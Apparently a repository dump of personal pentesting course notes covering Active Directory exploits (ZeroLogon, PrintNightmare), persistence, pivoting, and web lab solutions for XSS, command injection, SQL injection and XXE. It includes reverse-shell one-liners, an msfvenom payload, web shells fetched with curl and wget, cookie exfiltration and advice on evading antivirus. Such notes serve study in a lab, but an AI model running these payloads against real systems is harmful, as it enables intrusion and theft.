96 | 97 | 98 | 99 | - Set `/etc/hosts` in the Kali VM 100 | 101 | ```bash 102 | 192.168.31.90 hydra-dc.MARVEL.local 103 | 192.168.31.92 spiderman.MARVEL.local 104 | 192.168.31.93 thepunisher.MARVEL.local 105 | ``` 106 | 107 | --- 108 | 109 | -------------------------------------------------------------------------------- /peh/4-active-directory/5-ad-adv-attacks.md: -------------------------------------------------------------------------------- 1 | # AD - Additional Attacks 2 | 3 | ## ZeroLogon 4 | 5 | ➡️ [**ZeroLogon**](https://www.trendmicro.com/en_us/what-is/zerologon.html) is a vulnerability in the cryptography of Microsoft’s Netlogon process that allows an attack against Microsoft Active Directory domain controllers. Zerologon makes it possible for a hacker to impersonate any computer, including the root domain controller. 6 | 7 | The **Zerologon vulnerability (CVE-2020-1472)** is a critical flaw in Microsoft's **Netlogon Remote Protocol (MS-NRPC)** that affects **Active Directory (AD) domain controllers**. Zerologon allows an unauthenticated attacker with network access to a domain controller to establish a vulnerable Netlogon session and eventually gain domain administrator privileges. 8 | 9 | The vulnerability arises from a flaw in the **cryptographic implementation of the Netlogon protocol**, enabling attackers to impersonate any computer, including the root domain controller. By exploiting this, an attacker can effectively take over the entire domain. 10 | 11 | This is a very dangerous attack, not worth the risk of running it in a pentest. 12 | 13 | - [ZeroLogon testing script](https://github.com/SecuraBV/CVE-2020-1472) 14 | 15 | ```bash 16 | mkdir -p $HOME/tcm/peh/ad-attacks/zerologon 17 | cd $HOME/tcm/peh/ad-attacks/zerologon 18 | git clone https://github.com/dirkjanm/CVE-2020-1472.git 19 | wget https://raw.githubusercontent.com/SecuraBV/CVE-2020-1472/refs/heads/master/zerologon_tester.py 20 | 21 | python3 zerologon_tester.py hydra-dc 192.168.31.90 22 | ``` 23 | 24 | ![](.gitbook/assets/2025-02-16_10-42-02_887.png) 25 | 26 | - Proceed with the attack using [dirkjanm/CVE-2020-1472: PoC for Zerologon](https://github.com/dirkjanm/CVE-2020-1472) if the target is vulnerable. 27 | 28 | --- 29 | 30 | ## PrintNightmare 31 | 32 | > - [Playing with PrintNightmare | 0xdf hacks stuff](https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html) 33 | 34 | ➡️ The [**PrintNightmare**](https://www.huntress.com/blog/critical-vulnerability-printnightmare-exposes-windows-servers-to-remote-code-execution) vulnerability refers to critical security flaws in the Windows **Print Spooler service**, identified as **CVE-2021-1675** and **CVE-2021-34527**. 35 | 36 | PrintNightmare is a critical **remote code execution** and **local privilege escalation** vulnerability that allows attackers to execute arbitrary code with **SYSTEM** privileges, enabling them to install programs, modify data, or create new accounts with full user rights. **Exploitation can occur remotely or locally**, even on fully patched systems, if certain registry settings are misconfigured. Microsoft has released patches to address these issues, however, systems with specific registry configurations may remain vulnerable. 37 | 38 | ```bash 39 | # Impacket 40 | 41 | # Scanning 42 | rpcdump.py @192.168.31.90 | egrep 'MS-RPRN|MS-PAR' 43 | 44 | Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 45 | Protocol: [MS-RPRN]: Print System Remote Protocol 46 | # DC could be vulnerable 47 | 48 | # Attacking 49 | mkdir -p $HOME/tcm/peh/ad-attacks/printnightmare 50 | cd $HOME/tcm/peh/ad-attacks/printnightmare 51 | wget https://raw.githubusercontent.com/cube0x0/CVE-2021-1675/refs/heads/main/CVE-2021-1675.py 52 | 53 | # Open second terminal - Generate dll payload 54 | msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.31.131 LPORT=5555 -f dll > shell.dll 55 | msfconfole 56 | use multi/handler 57 | set payload windows/x64/shell_reverse_tcp 58 | set LPORT 5555 59 | set LHOST 192.168.31.131 60 | 61 | # Open third terminal - setup a file share 62 | smbserver.py share `pwd` -smb2support 63 | 64 | # Run attack 65 | python3 CVE-2021-1675.py marvel.local/fcastle:Password1@192.168.31.90 '\\192.168.31.131\share\shell.dll' 66 | ``` 67 | 68 | - The attack was executed on a fully patched **Windows Server 2022**, and if it failed, it is most likely due to the applied security patches. 69 | - The `dll` may need to be obfuscated to bypass AV detection. 70 | 71 | ```bash 72 | # CVE-2021-1675.py output 73 | [*] Connecting to ncacn_np:192.168.31.90[\PIPE\spoolss] 74 | [+] Bind OK 75 | [-] Failed to enumerate remote pDriverPath 76 | RPRN SessionError: unknown error code: 0x8001011b 77 | ``` 78 | 79 | --- 80 | 81 | -------------------------------------------------------------------------------- /peh/4-active-directory/6-ad-casestudies.md: -------------------------------------------------------------------------------- 1 | # AD - Case Studies 2 | 3 | ## Case study #1 4 | 5 | > - [AD Case Study #1 - You Spent How Much on Security? - TCM Security](https://tcm-sec.com/pentest-tales-001-you-spent-how-much-on-security/) 6 | 7 | This case study details a **penetration test** conducted on a **well-funded U.S. hospital** with a strong security infrastructure, including **IDS/IPS, CyberArk PAM, Symantec Endpoint Security, and proper patch management**. Despite these defenses, testers found **critical security gaps** that could be exploited. 8 | 9 | **Key Findings:** 10 | 11 | - **SMB Relay Attack Exposure:** 12 | - LLMNR/NBNS poisoning was **mitigated**, but **SMB relay attacks** were still possible 13 | - Attackers could use **NTLM relaying** to escalate privileges 14 | - **Privilege Escalation Risks:** 15 | - Misconfigurations and local users easy-reused hashes/passwords allowed **privilege escalation**, leading to potential **Domain Admin access** 16 | - Weak **Active Directory hardening** left **high-value targets exposed** 17 | - **Security Investment ≠ Full Protection:** 18 | - Even with expensive security solutions, **configuration weaknesses** left the network vulnerable 19 | - **Lateral movement & persistence techniques** were viable due to **improper segmentation** and **overprivileged accounts** 20 | 21 | **Key Takeaways:** 22 | 23 | - **Network segmentation & NTLM hardening** are critical 24 | - **Regular security assessments** are needed despite high investment in security tools 25 | - **Least privilege enforcement** should be a priority to prevent escalation 26 | 27 | This case study highlights how **misconfigurations and overlooked weaknesses** can lead to **serious security risks**, even in well-funded environments. 28 | 29 | --- 30 | 31 | ## Case study #2 32 | 33 | > - [AD Case Study #2 - #Pentest Tales #002: Digging Deep - TCM Security](https://tcm-sec.com/pentest-tales-002-digging-deep) 34 | 35 | This case study outlines a **penetration test** on a **well-funded U.S. hospital** with solid security measures, including **LLMNR/IPv6 disabled, SMB Signing enforced, IDS/IPS, and patched systems**. Despite these controls, the assessment revealed **critical security gaps** that could be exploited. 36 | 37 | **Key Findings:** 38 | 39 | - **Default Credentials on Development Apps:** 40 | - A **development environment application** was found using **default credentials**, granting unauthorized access. 41 | - Attackers could **leverage this access** to extract **sensitive information**. 42 | - **Local Administrator Password Reuse:** 43 | - The **same local admin password** was used across multiple machines. 44 | - Once a **single system** was compromised, **lateral movement** became trivial. 45 | - **WDigest Enabled on Legacy Systems:** 46 | - Older systems had **WDigest enabled**, storing **plaintext credentials** in memory. 47 | - Attackers could extract **Domain Admin credentials** using tools like **Mimikatz**. 48 | - **Overprivileged Service Accounts:** 49 | - Service accounts had **Domain Admin** privileges unnecessarily. 50 | - Compromising one of these accounts **led to full domain compromise**. 51 | 52 | **Key Takeaways:** 53 | 54 | - **Enforce unique local admin passwords** across endpoints (**LAPS**). 55 | - **Disable WDigest** on all systems to prevent plaintext credential exposure. 56 | - **Restrict service account privileges** to the **minimum necessary**. 57 | - **Regular security assessments** are necessary, even with strong security investments. 58 | 59 | This case highlights how **misconfigurations and weak credential management** can undermine otherwise strong defenses, making **lateral movement and domain compromise easy** for attackers. 60 | 61 | --- 62 | 63 | -------------------------------------------------------------------------------- /peh/5-post-exploitation/README.md: -------------------------------------------------------------------------------- 1 | # 5. Post Exploitation 2 | 3 | ## File transfers 4 | 5 | ```bash 6 | # HTTP via Python 7 | python3 -m http.server 80 8 | 9 | # Windows - Certutil 10 | certutil.exe -urlcache -f 11 | 12 | # Linux 13 | wget 14 | 15 | ... 16 | ``` 17 | 18 | --- 19 | 20 | ## Maintain access 21 | 22 | ➡️ **Maintaining access** during a penetration test refers to the techniques used to **retain control over a compromised system** for extended periods, even after reboots or security updates. This is a crucial phase in **post-exploitation**, allowing testers to simulate real-world attacker **persistence** and assess an organization's ability to detect and respond to such threats. 23 | 24 | **Metasploit persistence methods** 25 | 26 | 1. **Persistence scripts:** 27 | - `run persistence -h` → Displays available persistence options. 28 | - `exploit/windows/local/persistence` → Creates a **backdoor** using Metasploit. 29 | - `exploit/windows/local/registry_persistence` → Modifies **Windows Registry** for persistence. 30 | 2. **Scheduled Tasks:** 31 | - `run scheduleme` → Creates a **scheduled task** to execute payloads periodically. 32 | - `run schtaskabuse` → **Abuses schtasks** to maintain system access. 33 | 3. **User Account Manipulation:** 34 | - `net user hacker password123 /add` → Creates a **new user account** for persistent access. 35 | 36 | These techniques help attackers maintain **long-term access** even after a system reboot or network disconnection. Monitoring scheduled tasks, registry changes, and unauthorized user accounts is crucial to detecting and preventing persistence mechanisms. 37 | 38 | --- 39 | 40 | ## Pivoting 41 | 42 | ➡️ **Pivoting** is a technique used in penetration testing to **move laterally** within a network after compromising an initial system. It allows an attacker to **route traffic through the compromised machine** to access other internal systems that are otherwise unreachable from the external network. 43 | 44 | ### proxychains 45 | 46 | ➡️ [proxychains](https://github.com/haad/proxychains) - tool that forces any TCP connection initiated by an application to route through user-defined proxy servers, such as TOR or other SOCKS4, SOCKS5, or HTTP(S) proxies 47 | 48 | ```bash 49 | cat /etc/proxychains4.conf 50 | # check socks4 port 51 | 52 | ssh -f -N -D 9050 -i pivot @ 53 | 54 | # e.g. pivoting 55 | proxychains nmap -p 56 | 57 | proxychains GetUserSPNs.py MARVEL.local/fcastle:Password1 -dc-ip -request 58 | 59 | proxychains xfreerdp /u:administrator /p:'p@ssword' /v: 60 | 61 | proxychains firefox 62 | ``` 63 | 64 | ### sshuttle 65 | 66 | ➡️ [sshuttle](https://github.com/sshuttle/sshuttle) - transparent proxy server that forwards over SSH, supports DNS tunneling 67 | 68 | ```bash 69 | sshuttle -r @ --ssh-cmd "ssh -i pivot" 70 | # keep this terminal open 71 | # run commands in other terminals 72 | ``` 73 | 74 | ### chisel 75 | 76 | ➡️ [chisel](https://github.com/jpillora/chisel) - a fast TCP/UDP tunnel, transported over HTTP, secured via SSH 77 | 78 | --- 79 | 80 | ## Cleaning up 81 | 82 | ➡️ The **cleanup phase** is the final step in a penetration test, ensuring that **no traces** of testing activities remain on the target system or network. 83 | 84 | The goal is to restore the environment to its original state before the test, minimizing security risks and avoiding any disruption. 85 | 86 | - **Remove files** – Delete scripts, executables, and added files 87 | - **Eliminate persistence** – Remove malware, backdoors, tasks, and added user accounts 88 | - **Restore settings** – Revert settings, security configs, firewall rules, and permissions. 89 | - **Clear tracks** – Wipe command history and logs. 90 | 91 | 📌 From a hacker perspective, you need to "**make it look like you were never there**". 92 | 93 | --- 94 | 95 | -------------------------------------------------------------------------------- /peh/6-webapp/.gitbook/assets/2025-02-24_22-12-54_904.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/6-webapp/.gitbook/assets/2025-02-24_22-12-54_904.png -------------------------------------------------------------------------------- /peh/6-webapp/.gitbook/assets/2025-02-24_22-39-27_905.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/6-webapp/.gitbook/assets/2025-02-24_22-39-27_905.png -------------------------------------------------------------------------------- /peh/6-webapp/.gitbook/assets/2025-02-24_22-43-34_906.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/6-webapp/.gitbook/assets/2025-02-24_22-43-34_906.png -------------------------------------------------------------------------------- /peh/6-webapp/.gitbook/assets/2025-02-24_22-46-18_907.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/6-webapp/.gitbook/assets/2025-02-24_22-46-18_907.png -------------------------------------------------------------------------------- /peh/6-webapp/.gitbook/assets/2025-02-24_23-01-58_909.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/6-webapp/.gitbook/assets/2025-02-24_23-01-58_909.png -------------------------------------------------------------------------------- /peh/6-webapp/.gitbook/assets/2025-02-25_22-01-04_910.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/6-webapp/.gitbook/assets/2025-02-25_22-01-04_910.png -------------------------------------------------------------------------------- /peh/6-webapp/.gitbook/assets/2025-02-25_23-17-21_912.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/6-webapp/.gitbook/assets/2025-02-25_23-17-21_912.png -------------------------------------------------------------------------------- /peh/6-webapp/.gitbook/assets/2025-02-26_00-02-01_913.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/6-webapp/.gitbook/assets/2025-02-26_00-02-01_913.png -------------------------------------------------------------------------------- /peh/6-webapp/.gitbook/assets/2025-02-26_00-17-05_914.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/6-webapp/.gitbook/assets/2025-02-26_00-17-05_914.png -------------------------------------------------------------------------------- /peh/6-webapp/.gitbook/assets/2025-02-27_23-53-57_915.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/6-webapp/.gitbook/assets/2025-02-27_23-53-57_915.png -------------------------------------------------------------------------------- /peh/6-webapp/.gitbook/assets/2025-02-28_00-55-21_916.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/6-webapp/.gitbook/assets/2025-02-28_00-55-21_916.png -------------------------------------------------------------------------------- /peh/6-webapp/.gitbook/assets/2025-02-28_01-02-32_917.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/6-webapp/.gitbook/assets/2025-02-28_01-02-32_917.png -------------------------------------------------------------------------------- /peh/6-webapp/.gitbook/assets/2025-02-28_01-14-39_918.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/6-webapp/.gitbook/assets/2025-02-28_01-14-39_918.png -------------------------------------------------------------------------------- /peh/6-webapp/.gitbook/assets/2025-02-28_01-22-19_919.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/6-webapp/.gitbook/assets/2025-02-28_01-22-19_919.png -------------------------------------------------------------------------------- /peh/6-webapp/.gitbook/assets/2025-02-28_01-23-00_920.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/6-webapp/.gitbook/assets/2025-02-28_01-23-00_920.png -------------------------------------------------------------------------------- /peh/6-webapp/.gitbook/assets/2025-02-28_01-36-17_921.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/6-webapp/.gitbook/assets/2025-02-28_01-36-17_921.png -------------------------------------------------------------------------------- /peh/6-webapp/.gitbook/assets/2025-02-28_01-40-15_922.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/6-webapp/.gitbook/assets/2025-02-28_01-40-15_922.png -------------------------------------------------------------------------------- /peh/6-webapp/.gitbook/assets/2025-02-28_01-55-59_924.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/6-webapp/.gitbook/assets/2025-02-28_01-55-59_924.png -------------------------------------------------------------------------------- /peh/6-webapp/.gitbook/assets/2025-02-28_02-01-23_925.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/6-webapp/.gitbook/assets/2025-02-28_02-01-23_925.png -------------------------------------------------------------------------------- /peh/6-webapp/.gitbook/assets/2025-02-28_02-10-23_926.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/6-webapp/.gitbook/assets/2025-02-28_02-10-23_926.png -------------------------------------------------------------------------------- /peh/6-webapp/.gitbook/assets/2025-02-28_02-10-35_927.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/6-webapp/.gitbook/assets/2025-02-28_02-10-35_927.png -------------------------------------------------------------------------------- /peh/6-webapp/.gitbook/assets/2025-02-28_02-25-45_928.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/6-webapp/.gitbook/assets/2025-02-28_02-25-45_928.png -------------------------------------------------------------------------------- /peh/6-webapp/.gitbook/assets/2025-02-28_13-29-38_929.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/6-webapp/.gitbook/assets/2025-02-28_13-29-38_929.png -------------------------------------------------------------------------------- /peh/6-webapp/.gitbook/assets/2025-02-28_13-35-42_930.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/6-webapp/.gitbook/assets/2025-02-28_13-35-42_930.png -------------------------------------------------------------------------------- /peh/6-webapp/.gitbook/assets/2025-02-28_19-27-14_931.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/peh/6-webapp/.gitbook/assets/2025-02-28_19-27-14_931.png -------------------------------------------------------------------------------- /peh/6-webapp/1-web-lab.md: -------------------------------------------------------------------------------- 1 | # Web App Lab Setup 2 | 3 | > **Lab Requirements** 4 | > 5 | > - 1 Kali Linux VM 6 | > - [pimpmykali](https://github.com/Dewalt-arch/pimpmykali/blob/master/pimpmykali.sh) 7 | > - (optional) [peh-web-labs.tar.gz](https://cdn.fs.teachablecdn.com/CbIyLkOuS4GUH7TNFTFg) 8 | > - [Burp Suite](https://portswigger.net/burp/releases) 9 | 10 | - Run `pimpmykali.sh` with `E` selection for **PEH Course WebApp Labs** 11 | 12 | ```bash 13 | # Clone a Github repository in the "/opt" dir 14 | cd /opt 15 | sudo rm -rf pimpmykali/ 16 | sudo git clone https://github.com/Dewalt-arch/pimpmykali 17 | 18 | sudo /opt/pimpmykali/pimpmykali.sh 19 | # Run menu option E for the WebApp Labs 20 | # The labs start automatically 21 | 22 | # To START the labs 23 | cd $HOME/peh/labs 24 | ./start-peh-labs.sh 25 | 26 | # To (only) STOP the labs 27 | sudo docker stop $(sudo docker ps -aq) 28 | 29 | # To STOP and CLEANUP the labs 30 | cd $HOME/peh/labs 31 | ./cleanup-peh-labs.sh 32 | # This script removes ALL DOCKER CONTAINERS and NETWORKS!!! 33 | ``` 34 | 35 | - Run Burp Suite and open its proxy browser 36 | - Browse to `http://localhost` 37 | - The database can be initialized/reset at `http://localhost/init.php` 38 | 39 | --- 40 | 41 | > # Lab solutions 42 | > 43 | > ## Command Inj 0x02 44 | > 45 | > `https://tcm-sec.com/& whoami& asd` 46 | >`https://tcm-sec.com/ | sleep 10 | asd` 47 | > 48 | >`https://webhook.site//?`whoami`` 49 | > 50 | > ## Command Inj 0x03 51 | > 52 | > `45123)^2))}';whoami;#` 53 | > 54 | >## File upload 0x01 55 | > 56 | >- Intercept 57 | > - Change contents 58 | > - Or turn off JS 59 | > 60 | > ## File upload 0x02 61 | > 62 | > - Bypass the client-side again 63 | >- Intercept and change the content-type to image/png or image/jpeg 64 | > 65 | >## File upload 0x03 66 | > 67 | >- Bypass the client-side again 68 | > - Intercept and change the content-type again 69 | >- Use an extension that's not in the blocklist (.phtml) 70 | > 71 | >## Authentication 0x01 72 | > 73 | >- Brute force 74 | > 75 | >## Authentication 0x02 76 | > 77 | >- MFA code, switch username (code is OK for all users) 78 | > - Or, just brute the code 79 | > 80 | > ## Authentication 0x03 81 | > 82 | >- Account lockout after 5 attempts, therefore brute the top 4 passwords against a username list 83 | > 84 | >- common password list: 85 | > 86 | > ``` 87 | >password 88 | > password123 89 | >letmein 90 | > manchesterunited 91 | >``` 92 | > 93 | >- common usernames list: `/usr/share/seclists/Usernames/Names/names.txt` 94 | > 95 | >## XXE, IDOR, capstone 96 | > 97 | > ### XXE 0x01 98 | > 99 | >``` 100 | > 101 | > ]> 103 | > usernamepass 104 | >``` 105 | > 106 | >``` 107 | > 108 | > 110 | >]> 111 | > &xxe;pass 112 | >``` 113 | > 114 | >### IDOR 115 | > 116 | >`fuzz the parameter` 117 | > 118 | > - find an admin user (or all of the admin users) 119 | > 120 | > ### Capstone 121 | > 122 | > SQLi to get into admin panel 123 | >File upload to get RCE 124 | > 125 | >- XSS in the message alert 126 | > - XSS in account names probably? need to test 127 | > 128 | > - brute force user accounts 129 | > 130 | > - SQLi on adding rating 131 | > 132 | >`http://localhost/capstone/coffee.php?coffee=3' or 1=1-- -` 133 | > 134 | >`http://localhost/capstone/coffee.php?coffee=1%27%20union%20select%20null,username,password,null,null,null,null%20from%20users--%20-` 135 | > 136 | ># To do list 137 | > 138 | >- file upload capstone 139 | > - auth0x03 testing -------------------------------------------------------------------------------- /peh/6-webapp/3-web-xss.md: -------------------------------------------------------------------------------- 1 | # Web App - XSS 2 | 3 | > - [Cross-Site Scripting (XSS) Cheat Sheet - 2024 Edition | Web Security Academy](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) 4 | 5 | ➡️ **Cross-site scripting** (**XSS**) allows an attacker to compromise the interactions of the users with a vulnerable application. It lets the attacker execute (malicious) **JavaScript** in a victim's browser, compromising the user's interaction with the application. 6 | 7 | - **Reflected XSS** 8 | - when an application unsafely includes user-supplied data (injected script) from an HTTP request in its immediate response 9 | - payload (malicious script) come from the current HTTP request 10 | - **Stored XSS** 11 | - when an application receives and stores data from an untrusted source and unsafely includes it within its later HTTP responses 12 | - payload (malicious script) come from the application's database 13 | - **DOM-based XSS** 14 | - when client-side Javascript (code) unsafely processes data from an untrusted source and writes it back to the DOM 15 | - everything happens locally in the browser 16 | 17 | ```bash 18 | alert(1) 19 | print() 20 | prompt("Hello") 21 | 22 | # log pressed key 23 | function logKey(event){console.log(event.key)} 24 | document.addEventListener('keydown', logKey) 25 | ``` 26 | 27 | --- 28 | 29 | ## XSS - DOM 30 | 31 | - The request happens entirelly locally 32 | - no request seen in the browser **Dev Tools / Network** tab 33 | - Try some basic payloads 34 | 35 | ```bash 36 | 37 | # did not work, it is not called/triggered 38 | 39 | 40 | # works - injects an event-driven JavaScript payload that executes prompt(1) when the image fails to load due to an invalid source 41 | 42 | 43 | # redirect the user to another webpage 44 | ``` 45 | 46 | - The lab can be used for testing other payloads 47 | 48 | --- 49 | 50 | ## Stored XSS 51 | 52 | - To check if XSS is stored for more users, use 53 | - incognito sessions 54 | - or [Firefox Containers](https://addons.mozilla.org/en-US/firefox/addon/multi-account-containers/) 55 | - to create 2 different environments with separate/difference accounts 56 | - First try some HTML injection, once found out if it works, XSS follows 57 | - every user that visits the page is impacted by the **stored XSS payload** 58 | 59 | ```bash 60 |

Test

61 | # works - check on the second environment the Stored XSS 62 | 63 | 64 | # works - refresh second environment and you'll see the prompt 65 | 66 | 67 | # Cookie can be stolen 68 | ``` 69 | 70 | ![](.gitbook/assets/2025-02-25_22-01-04_910.png) 71 | 72 | --- 73 | 74 | ## XSS - Challenge 75 | 76 | - Open `http://localhost/labs/x0x03.php` first Firefox container 77 | - Open `http://localhost/labs/x0x03_admin.php` in the second container 78 | - Goal - exfiltrate the admin cookie 79 | - Use `netcat` or [https://webhook.site](https://webhook.site) (not for private traffic) 80 | - use **Collaborator** (with BurpSuite Pro) 81 | 82 | ```bash 83 | 84 | ``` 85 | 86 | ```bash 87 | admin_cookie 88 | 5ac5355b84894ede056ab81b324c4675 89 | ``` 90 | 91 | ![](.gitbook/assets/2025-02-25_23-17-21_912.png) 92 | 93 | --- 94 | 95 | -------------------------------------------------------------------------------- /peh/6-webapp/4-web-cmd-injection.md: -------------------------------------------------------------------------------- 1 | # Web App - Command Injection 2 | 3 | > - [PayloadsAllTheThings - Command Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection) 4 | > - [Command injection | AppSecExplained](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/command-injection) 5 | 6 | ➡️ **OS Command Injection**, or shell injection, occurs when a vulnerable application passes unvalidated user input to the system shell, allowing attackers to execute arbitrary OS commands on the server hosting the web app. 7 | 8 | --- 9 | 10 | ## Command Injection - Basics 11 | 12 | ```bash 13 | | whoami # 14 | & whoami& asd 15 | ; whoami; asd 16 | # Result: www-data 17 | 18 | ; cat /etc/passwd; asd 19 | & ls -lah& asd 20 | # Check result in Source Code for better reading 21 | ``` 22 | 23 | ![](.gitbook/assets/2025-02-26_00-02-01_913.png) 24 | 25 | - Pop a shell - check [Reverse Shell Cheat Sheet - Internal All The Things](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/) 26 | 27 | ```bash 28 | ; which bash; asd 29 | # Result: /bin/bash 30 | 31 | ; /bin/bash -i >& /dev/tcp/192.168.31.131/4444 0>&1; asd 32 | # does NOT work 33 | 34 | ; which python; asd 35 | ; which python3; asd 36 | 37 | ; which php; asd 38 | # Result: /usr/local/bin/php 39 | 40 | ; php -r '$sock=fsockopen("192.168.31.131",4444);exec("/bin/sh -i <&3 >&3 2>&3");'; asd 41 | ``` 42 | 43 | ![](.gitbook/assets/2025-02-26_00-17-05_914.png) 44 | 45 | --- 46 | 47 | ## Command Injection - Blind/Out-of-band 48 | 49 | ```bash 50 | https://tcm-sec.com # Website OK 51 | https://tcm-sec.com/idontexist # Website not found 52 | 53 | https://tcm-sec.com/; whoami; asd # Website OK 54 | ``` 55 | 56 | - Open [https://webhook.site/](https://webhook.site/) 57 | - **Out of band command injection** - captured from a different place 58 | 59 | ```bash 60 | https://webhook.site/4a14cea0-1e8c-4707-a596-cf1939bd4a76?`whoami` 61 | 62 | # Result 63 | # https://webhook.site/4a14cea0-1e8c-4707-a596-cf1939bd4a76?www-data 64 | ``` 65 | 66 | ```bash 67 | # Test a wget 68 | python3 -m http.server 8888 69 | 70 | # Command injection string 71 | https://tcm-sec.com \n wget 192.168.31.131:8888/test 72 | # the request worked 73 | ``` 74 | 75 | - Upload a shell and trigger it 76 | 77 | ```bash 78 | cd $HOME/tcm/peh/webapp 79 | cp /usr/share/webshells/laudanum/php/php-reverse-shell.php rev.php 80 | 81 | # Update $ip and $port 82 | nano rev.php 83 | # 192.168.31.131, port 4444 84 | python3 -m http.server 8888 85 | 86 | # Command injection 87 | https://tcm-sec.com \n wget 192.168.31.131:8888/rev.php 88 | https://tcm-sec.com && curl http://192.168.31.131:8888/rev.php > $HOME/peh/labs/rev.php 89 | # Those injections may not work, but this is the idea 90 | 91 | # Start a listener and navigate to http://localhost/rev.php 92 | # Got reverse shell 93 | ``` 94 | 95 | --- 96 | 97 | ## Command Injection - Challenge 98 | 99 | - The app executes this 100 | 101 | ```bash 102 | # Executed with Registration = TEST, Position X = 123 and PositionY = 456 103 | awk 'BEGIN {print sqrt(((-123)^2) + ((-456)^2))}' 104 | 105 | # Try injection on position Y 106 | 456)^2))}';whoami; 107 | 456)^2))}';whoami;# 108 | # Result: 472.298 www-data - Worked 109 | 110 | # Pop a shell via a php payload 111 | 112 | 456)^2))}';php -r '$sock=fsockopen("192.168.31.131",4444);exec("/bin/sh -i <&3 >&3 2>&3");';# 113 | 114 | # Reverse shell received 115 | ``` 116 | 117 | ![Command injection](.gitbook/assets/2025-02-27_23-53-57_915.png) 118 | 119 | --- 120 | 121 | -------------------------------------------------------------------------------- /peh/6-webapp/7-web-xxe.md: -------------------------------------------------------------------------------- 1 | # Web App - XXE 2 | 3 | > - [XXE (XML external entity) injection | AppSecExplained](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/xxe-xml-external-entity-injection) 4 | > - [PayloadsAllTheThings - XXE Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XXE%20Injection/README.md) 5 | 6 | ➡️ **XML External Entity** (**XXE**) injection is a security vulnerability that occurs when an application processes XML input containing references to external entities without proper validation. 7 | 8 | --- 9 | 10 | ## XXE - External Entities Injection 11 | 12 | ```bash 13 | cd $HOME/peh/labs/user-content 14 | xxe-exploit.xml 15 | xxe-safe.xml 16 | 17 | cat xxe-safe.xml 18 | 19 | 20 | 21 | testuser 22 | testpass 23 | 24 | 25 | cat xxe-exploit.xml 26 | 27 | 28 | 30 | ]> 31 | &xxe;pass 32 | ``` 33 | 34 | - Upload `xxe-safe.xml` and check the result. 35 | - Try `xxe-exploit.xml` 36 | - **XML Declaration & DOCTYPE**: Declares an XML document and defines an external entity 37 | - **Entity Definition**: The external entity `xxe` is set to read the file `/etc/passwd` 38 | - **Usage in XML**: The entity is referenced in the `` tag 39 | - 